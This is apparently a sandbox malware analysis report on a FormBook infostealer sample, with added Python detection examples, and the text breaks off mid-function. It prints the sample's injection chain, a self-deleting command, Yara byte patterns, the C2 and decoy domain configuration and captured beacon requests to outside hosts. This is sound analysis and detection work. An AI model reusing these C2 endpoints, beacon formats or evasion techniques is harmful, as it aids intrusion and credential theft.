Windows Analysis Report
Notificaci#U00f3n de pago.exe

Overview

General Information

Sample Name: Notificaci#U00f3n de pago.exe (the sandbox escapes the "ó" of the submitted name "Notificación de pago.exe", Spanish for "payment notification", as #U00f3)
Analysis ID: 626150
MD5: 297e8b7f26a2eb1af366cac0202eca9a
SHA1: 4b3e36dcd7ea9785f93e43699e1224ad30626148
SHA256: 441ba10d2078c45be3d266523f77b59a1478f61ce09f2097ccc276d534c35855
Tags: exe

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification (radar chart omitted)

Process Tree

  • System is w10x64
  • Notificaci#U00f3n de pago.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
    • Notificaci#U00f3n de pago.exe (PID: 6968 cmdline: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe MD5: 297E8B7F26A2EB1AF366CAC0202ECA9A)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 6172 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 6596 cmdline: /c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
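The tree above is the complete FormBook staging chain: the .NET loader starts a second copy of itself and hollows it, the hollowed copy injects into the already-running explorer.exe (drawn as a child because the sandbox attributes injected activity to the injector), the injected code starts a 32-bit system binary from SysWOW64 (WWAHost.exe here; FormBook picks the host from a fixed list of Windows executables), and that process runs cmd.exe /c del on the original sample. What follows is an added example, not part of the Joe Sandbox report, of matching that chain in process-creation telemetry. The events are constructed to mirror the tree; PIDs, images and command lines are the report's, while the parent of explorer.exe, the parent of the first sample instance and the image path of cmd.exe are assumptions.

```python
import re

# Constructed process-creation events mirroring the report's tree (same images,
# PIDs and command lines). Field names loosely follow Sysmon Event ID 1. The
# cmd.exe image path is an assumption (the report shows only its command line),
# and explorer.exe (PID 3968) is listed as a pre-existing process with an
# unknown parent: the sample injected into it rather than creating it.
SAMPLE = r"C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
EVENTS = [
    {"pid": 3968, "ppid": 1, "image": r"C:\Windows\Explorer.EXE", "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 6360, "ppid": 2000, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 6968, "ppid": 6360, "image": SAMPLE, "cmdline": SAMPLE},
    {"pid": 6172, "ppid": 3968, "image": r"C:\Windows\SysWOW64\WWAHost.exe", "cmdline": r"C:\Windows\SysWOW64\WWAHost.exe"},
    {"pid": 6596, "ppid": 6172, "image": r"C:\Windows\SysWOW64\cmd.exe", "cmdline": f'/c del "{SAMPLE}"'},
    {"pid": 6568, "ppid": 6596, "image": r"C:\Windows\System32\conhost.exe", "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(by_pid, pid):
    """Walk ppid links upward, yielding each ancestor that is in the index."""
    seen = {pid}
    event = by_pid.get(pid)
    while event is not None and event["ppid"] in by_pid and event["ppid"] not in seen:
        event = by_pid[event["ppid"]]
        seen.add(event["pid"])
        yield event


def detect(events):
    """Return (rule, pid) findings for the FormBook-style chain."""
    by_pid = {e["pid"]: e for e in events}
    executed = {e["image"].lower() for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        # Rule 1: an executable starting a second copy of itself. Weak alone, but
        # it is the usual prelude to hollowing the child (the report's "Creates a
        # process in suspended mode" / "Sample uses process hollowing technique").
        if parent is not None and parent["image"].lower() == e["image"].lower():
            findings.append(("self_relaunch", e["pid"]))
        if image_name(e["image"]) != "cmd.exe":
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m or m.group(1).lower() not in executed:
            continue
        # Rule 2: cmd.exe deleting an executable that already ran in this tree
        # (the report's "Self deletion via cmd delete").
        findings.append(("self_delete", e["pid"]))
        # Rule 3: that cmd.exe hangs off a SysWOW64 system binary whose own parent
        # is explorer.exe. How rare that is in your baseline is an assumption to
        # tune on your own telemetry.
        chain = [image_name(a["image"]) for a in ancestors(by_pid, e["pid"])]
        if (len(chain) >= 2 and chain[1] == "explorer.exe"
                and "\\syswow64\\" in by_pid[e["ppid"]]["image"].lower()):
            findings.append(("explorer_to_syswow64_host_to_cmd", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Rule 3 only fires when explorer.exe is present in the index; without it the chain is one level shorter and only the self-deletion is reported, which is the behaviour you want when the injector cannot be tied to its host process.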
Malware Configuration

{"C2 list": ["www.hkqhdq.com/d6fp/"], "decoy": ["cwejman.art", "chandlerfeed.site", "team-ctctitleco.com", "yennyalfonsotorres84.com", "letseatdonuts.com", "runicarcanum.com", "info-center.xyz", "stemcanada.net", "granerde.com", "pixelatedkittys.com", "selfservicerepait.com", "lasvegastechman.com", "massage-rino.com", "bfederation.com", "kjy9.com", "homeiexpress.com", "hayatiorhan.com", "89739134.com", "kristin-feireiss-80.com", "zfp2.xyz", "peq2ulps.com", "redgreenbandits.com", "doblehuella.com", "521xiao.com", "freedomadventurescharters.com", "424259842.xyz", "peachfsg.com", "marketery.net", "dubhmor-dg.com", "sustainabilitymantra.xyz", "obivka.site", "yoursjoysled.com", "neurovirtualusa.com", "938323373.com", "seabornecap.com", "rjxingfu.com", "vacationsimplified.com", "elramony.com", "craftivitycrew.com", "cryptoheritageclub.com", "tcr8.fund", "gloumarc.com", "marry-me-today.com", "screator.life", "tokusou-clean.com", "sagesse.agency", "borilius.com", "www-saber.com", "bondjetfuel.com", "sedadbir.com", "interparking-60years.com", "mdartwork.com", "materialy.pro", "theguiriguide.com", "islandacoustical.com", "einfachmalgut.com", "nonstrappedmedia.club", "librevillegabon.com", "wasatchholidayclassic.net", "shanhaiyizhi.com", "triptoasiam.com", "s3industrail.com", "evertribute.com", "marketing-toolbox.com"]}
Source | Rule | Description | Author | Strings
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(31 further matching memory regions not shown)

Source | Rule | Description | Author | Strings
8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8192:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15535:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14fe1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15637:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8baa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1425c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9922:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8f92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x16335:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15de1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x16437:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x165af:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x99aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1505c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa722:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(22 further matching unpacked PE files not shown)
          No Sigma rule has matched
          No Snort rule has matched
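Two of the patterns above are worth reading rather than just matching. Formbook_1's $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) decodes to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, which is the RDTSC timing check the signature list attributes to the sample. JPCERT's three strings are each a 5-byte push imm32 (68 xx xx xx xx) of a 32-bit constant; the rule's string names tie them to sqlite3_step, sqlite3_column_text and sqlite3_column_blob, which FormBook resolves by hash for browser-database theft (the hash function itself is not on this page). Note also that every offset is exactly 0xE00 lower in the .unpack matches than in the .sdmp matches (0x8c08 vs 0x7e08, 0x18809 vs 0x17a09): the dump is the mapped image and the unpack is written back to file layout, a gap consistent with a first section at file offset 0x200 mapped at RVA 0x1000. That is an inference from the numbers, not something the report states. The following added example (not the report's or the rule authors' code) re-implements the matching in Python over a constructed buffer that places the published byte sequences at the reported offsets; the match-count threshold stands in for the real rule conditions and is an assumption.

```python
import struct

# Yara strings from the matches above, with the offsets reported for the
# 00000008.00000002.383069133.0000000000400000 .sdmp region.
SIGNATOR = {  # Formbook_1 (yara-signator, Felix Bilstein)
    "sequence_0": ("03 C8 0F 31 2B C1 89 45 FC", [0x8C08, 0x8F92]),
    "sequence_1": ("3C 24 0F 84 76 FF FF FF 3C 25 74 94", [0x16335]),
    "sequence_2": ("3B 4F 14 73 95 85 C9 74 91", [0x15DE1]),
    "sequence_3": ("3C 69 75 44 8B 7D 18 8B 0F", [0x16437]),
    "sequence_4": ("5D C3 8D 50 7C 80 FA 07", [0x165AF]),
    "sequence_5": ("0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06", [0x99AA]),
    "sequence_6": ("57 89 45 FC 89 45 F4 89 45 F8", [0x1505C]),
    "sequence_7": ("66 89 0C 02 5B 8B E5 5D", [0xA722]),
    "sequence_8": ("3C 54 74 04 3C 74 75 F4", [0x1B987]),
    "sequence_9": ("56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00", [0x1CA8A]),
}
JPCERT = {  # Formbook (JPCERT/CC): each string is `push imm32` of an API-hash constant
    "sqlite3step": ("68 34 1C 7B E1", [0x18809, 0x1891C]),
    "sqlite3text": ("68 38 2A 90 C5", [0x18838, 0x1895D]),
    "sqlite3blob": ("68 53 D8 7F 8C", [0x1884B, 0x18973]),
}
# Every offset above is 0xE00 higher in the .sdmp than in the corresponding .unpack match.
SDMP_TO_UNPACK_DELTA = 0xE00


def hexpat(text):
    return bytes.fromhex(text.replace(" ", ""))


def build_buffer(*tables):
    """Constructed stand-in for the dump: zero-filled, with each pattern written at its reported offsets."""
    size = max(off + len(hexpat(pat)) for t in tables for pat, offs in t.values() for off in offs)
    buf = bytearray(size)
    for t in tables:
        for pat, offs in t.values():
            for off in offs:
                buf[off:off + len(hexpat(pat))] = hexpat(pat)
    return bytes(buf)


def find_all(buf, needle):
    hits, i = [], buf.find(needle)
    while i != -1:
        hits.append(i)
        i = buf.find(needle, i + 1)
    return hits


def scan(buf, table):
    """Offsets at which each Yara string of `table` occurs in `buf`."""
    return {name: find_all(buf, hexpat(pat)) for name, (pat, _) in table.items()}


def push_imm32(pattern):
    """`68 xx xx xx xx` is x86 `push imm32`; return the little-endian immediate."""
    raw = hexpat(pattern)
    if len(raw) != 5 or raw[0] != 0x68:
        raise ValueError("not a push imm32 pattern")
    return struct.unpack("<I", raw[1:])[0]


def verdict(buf, min_sequences=7):
    """Evaluate both rules. `min_sequences` is an assumed threshold, not Formbook_1's real condition."""
    sig = scan(buf, SIGNATOR)
    jp = scan(buf, JPCERT)
    return {
        "signator_matched": sum(1 for hits in sig.values() if hits) >= min_sequences,
        "jpcert_matched": all(jp.values()),
        "api_hashes": {name: push_imm32(pat) for name, (pat, _) in JPCERT.items()},
    }


def to_unpack_offset(sdmp_offset):
    """Translate a .sdmp match offset to the offset of the same bytes in the .unpack file."""
    return sdmp_offset - SDMP_TO_UNPACK_DELTA


if __name__ == "__main__":
    dump = build_buffer(SIGNATOR, JPCERT)
    print(verdict(dump))
    print(hex(to_unpack_offset(0x8C08)))  # 0x7e08, the 8.0...400000.4.unpack offset of $sequence_0
```

Running the same scan over a real dump is a matter of replacing `build_buffer` with `open(path, "rb").read()`; the offset translation only holds for this sample's layout and should be recomputed from a pair of matches before being trusted on another.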

          AV Detection

Source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.hkqhdq.com/d6fp/"], "decoy": ["cwejman.art", "chandlerfeed.site", "team-ctctitleco.com", "yennyalfonsotorres84.com", "letseatdonuts.com", "runicarcanum.com", "info-center.xyz", "stemcanada.net", "granerde.com", "pixelatedkittys.com", "selfservicerepait.com", "lasvegastechman.com", "massage-rino.com", "bfederation.com", "kjy9.com", "homeiexpress.com", "hayatiorhan.com", "89739134.com", "kristin-feireiss-80.com", "zfp2.xyz", "peq2ulps.com", "redgreenbandits.com", "doblehuella.com", "521xiao.com", "freedomadventurescharters.com", "424259842.xyz", "peachfsg.com", "marketery.net", "dubhmor-dg.com", "sustainabilitymantra.xyz", "obivka.site", "yoursjoysled.com", "neurovirtualusa.com", "938323373.com", "seabornecap.com", "rjxingfu.com", "vacationsimplified.com", "elramony.com", "craftivitycrew.com", "cryptoheritageclub.com", "tcr8.fund", "gloumarc.com", "marry-me-today.com", "screator.life", "tokusou-clean.com", "sagesse.agency", "borilius.com", "www-saber.com", "bondjetfuel.com", "sedadbir.com", "interparking-60years.com", "mdartwork.com", "materialy.pro", "theguiriguide.com", "islandacoustical.com", "einfachmalgut.com", "nonstrappedmedia.club", "librevillegabon.com", "wasatchholidayclassic.net", "shanhaiyizhi.com", "triptoasiam.com", "s3industrail.com", "evertribute.com", "marketing-toolbox.com"]}
Source: Notificaci#U00f3n de pago.exe | Virustotal: Detection: 21%
Source: Notificaci#U00f3n de pago.exe | ReversingLabs: Detection: 41%
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Notificaci#U00f3n de pago.exe | Joe Sandbox ML: detected
Source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Notificaci#U00f3n de pago.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: Notificaci#U00f3n de pago.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: WWAHost.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb8A source: Notificaci#U00f3n de pago.exe
          Source: Binary string: WWAHost.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.386556688.0000000003820000.00000040.10000000.00040000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381620800.0000000003900000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.381239954.0000000003825000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Notificaci#U00f3n de pago.exe, 00000008.00000002.384074601.0000000001A50000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000002.385236446.0000000001B6F000.00000040.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.308300902.00000000018B3000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000008.00000003.306800992.000000000171A000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 0000000E.00000003.383100819.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000003.385157630.0000000003790000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp, WWAHost.exe, 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: FormatExcept.pdb source: Notificaci#U00f3n de pago.exe
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop edi

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 104.195.7.239 80
Source: C:\Windows\explorer.exe | Domain query: www.theguiriguide.com
Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
Source: C:\Windows\explorer.exe | Domain query: www.librevillegabon.com
Source: C:\Windows\explorer.exe | Domain query: www.team-ctctitleco.com
Source: C:\Windows\explorer.exe | Domain query: www.evertribute.com
Source: Malware configuration extractor | URLs: www.hkqhdq.com/d6fp/
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: global traffic | HTTP traffic detected: GET /d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb HTTP/1.1 | Host: www.evertribute.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none; the 7-byte body is all 0x00)
Source: global traffic | HTTP traffic detected: GET /d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb HTTP/1.1 | Host: www.theguiriguide.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none; the 7-byte body is all 0x00)
Source: global traffic | HTTP traffic detected: GET /d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb HTTP/1.1 | Host: www.librevillegabon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (none; the 7-byte body is all 0x00)
Source: Joe Sandbox View | IP Address: 192.0.78.25
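The three GETs share the configured URI path /d6fp/ but go to www.evertribute.com, www.theguiriguide.com and www.librevillegabon.com, all of which are in the decoy list; the configured C2 host www.hkqhdq.com does not appear anywhere in the captured traffic. That is FormBook's normal behaviour, and the practical consequence is that blocking only the domains seen in the PCAP misses the real C2. The requests also carry no User-Agent, use Connection: close with a body of seven 0x00 bytes, and the second query parameter (q6AlF=0txdQnwxgb) is constant across all three while the first varies. The added example below (not the report's code) parses the configuration and the requests and reports those signals; the configuration is reduced to a subset of the decoy list, and the raw requests are constructed from the report's lines with CRLF framing and header order assumed.

```python
from urllib.parse import parse_qs, urlsplit

# Subset of the extracted configuration shown above: the single C2 entry and
# six of the 64 decoy domains (the three that were contacted plus three others).
CONFIG = {
    "C2 list": ["www.hkqhdq.com/d6fp/"],
    "decoy": ["team-ctctitleco.com", "letseatdonuts.com", "theguiriguide.com",
              "librevillegabon.com", "evertribute.com", "marketing-toolbox.com"],
}


def _req(query, host):
    """Constructed raw request: request line, Host, Connection: close, no User-Agent,
    7-byte all-zero body as in the report; CRLF framing is assumed."""
    return f"GET /d6fp/?{query} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode() + b"\x00" * 7


RAW_REQUESTS = [
    _req("7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb", "www.evertribute.com"),
    _req("7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb", "www.theguiriguide.com"),
    _req("7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb", "www.librevillegabon.com"),
]


def parse_request(raw):
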